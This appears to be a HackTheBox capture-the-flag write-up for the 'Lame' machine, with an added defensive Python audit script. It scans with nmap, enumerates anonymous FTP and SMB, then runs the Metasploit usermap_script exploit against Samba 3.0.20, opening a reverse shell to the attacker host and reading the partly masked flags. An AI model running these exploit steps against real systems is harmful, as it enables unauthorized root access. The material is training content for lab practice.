Let's kick this off by using nmap to scan the target:
nmap -A 10.10.10.3 |tee -a lame.txt
The -A flag sets the scan to aggressive... not always the best choice, but I am in a bit of a mood!
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
First, try an anonymous FTP login and enumerate:
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> pwd
257 "/"
ftp> cd ..
Second, try smbclient to enumerate port 445:
root@kali:~/HTB/prep/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
We can see that the target is running Samba 3.0.20-Debian. Maybe it has some known vulnerability we can find, but first let's take the hint and explore tmp:
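As an added example (not part of the original writeup), here is a small Python audit script that parses the nmap service lines and the smbclient server string shown above and flags what a defender should act on: SMB exposed to the network, and an exact Samba build sitting on the long-unsupported 3.0 branch. The sample inputs are constructed from the output above, and EOL_SAMBA_BRANCH is an assumed policy threshold.

```python
import re
from typing import List, NamedTuple, Optional, Tuple
# Constructed sample: the service lines nmap -A printed above (what tee wrote to lame.txt).
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""
# Constructed sample: the IPC$ line from smbclient -L, which leaks the exact build string.
SAMPLE_SMB = "IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))"
# Assumed policy threshold: anything on the 3.0 branch or older is unsupported and must go.
EOL_SAMBA_BRANCH = (3, 0)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

class Service(NamedTuple):
    port: int
    proto: str
    name: str
    version: str

def parse_nmap(text: str) -> List[Service]:
    """Extract open ports from nmap normal output; header and Service Info lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            services.append(Service(int(m[1]), m[2], m[3], m[4].strip()))
    return services

def samba_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Return an exact x.y.z Samba version from a banner; nmap's '3.X - 4.X' guess yields None."""
    m = re.search(r"Samba\s+(\d+)\.(\d+)\.(\d+)", banner)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None

def audit(nmap_text: str, smb_banner: str) -> List[str]:
    """Produce the findings a defender wants from the two outputs in the walkthrough."""
    findings = []
    services = parse_nmap(nmap_text)
    smb_ports = [s.port for s in services if s.name == "netbios-ssn" or "Samba" in s.version]
    if smb_ports:
        findings.append(f"SMB exposed on {smb_ports}; restrict to trusted networks or disable")
    # nmap's fingerprint is coarse, so the exact string smbclient showed is what we rate.
    exact = samba_version(smb_banner)
    if exact and exact[:2] <= EOL_SAMBA_BRANCH:
        findings.append(f"Samba {'.'.join(map(str, exact))} is on the unsupported 3.0 branch or older; upgrade")
    return findings
```

Running audit(SAMPLE_NMAP, SAMPLE_SMB) yields two findings; note that nmap alone could not pin the version, which is why the smbclient server string matters to an asset inventory.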
root@kali:~/HTB/prep/lame# smbclient //10.10.10.3/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 6 11:38:07 2019
.. DR 0 Sun May 20 20:36:12 2012
orbit-makis DR 0 Wed Nov 6 11:25:31 2019
.ICE-unix DH 0 Wed Nov 6 10:47:27 2019
.X11-unix DH 0 Wed Nov 6 10:47:51 2019
gconfd-makis DR 0 Wed Nov 6 11:25:31 2019
5141.jsvc_up R 0 Wed Nov 6 10:48:34 2019
.X0-lock HR 11 Wed Nov 6 10:47:51 2019
7282168 blocks of size 1024. 5678328 blocks available
smb: \>
Nothing immediately helpful here... so let's check Searchsploit for possible known exploits.
Searchsploit reveals a Metasploit exploit for Samba 3.x. OK, let's see how effective it is...
Start up msfconsole, then:
use exploit/multi/samba/usermap_script
Use the command show options to see what info is required to make this work, then:
set rhosts 10.10.10.3
Pull the trigger with the exploit command:
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.31:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gcMvWCjjW9n0VrCc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gcMvWCjjW9n0VrCc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.31:4444 -> 10.10.10.3:54951) at 2020-01-21 11:42:12 -0500
id
uid=0(root) gid=0(root)
cd /home
ls
ftp
makis
service
user
cd makis
ls
user.txt
cat user.txt
69xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxc5
cat /root/root.txt
92xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdf
Oh, right... that was quick. I can see where the box gets its name from now; nobody in their right mind should still be running this Samba version!
A good easy box for beginners to have a go at the basic tools and methodology. Let's quickly move on to another box...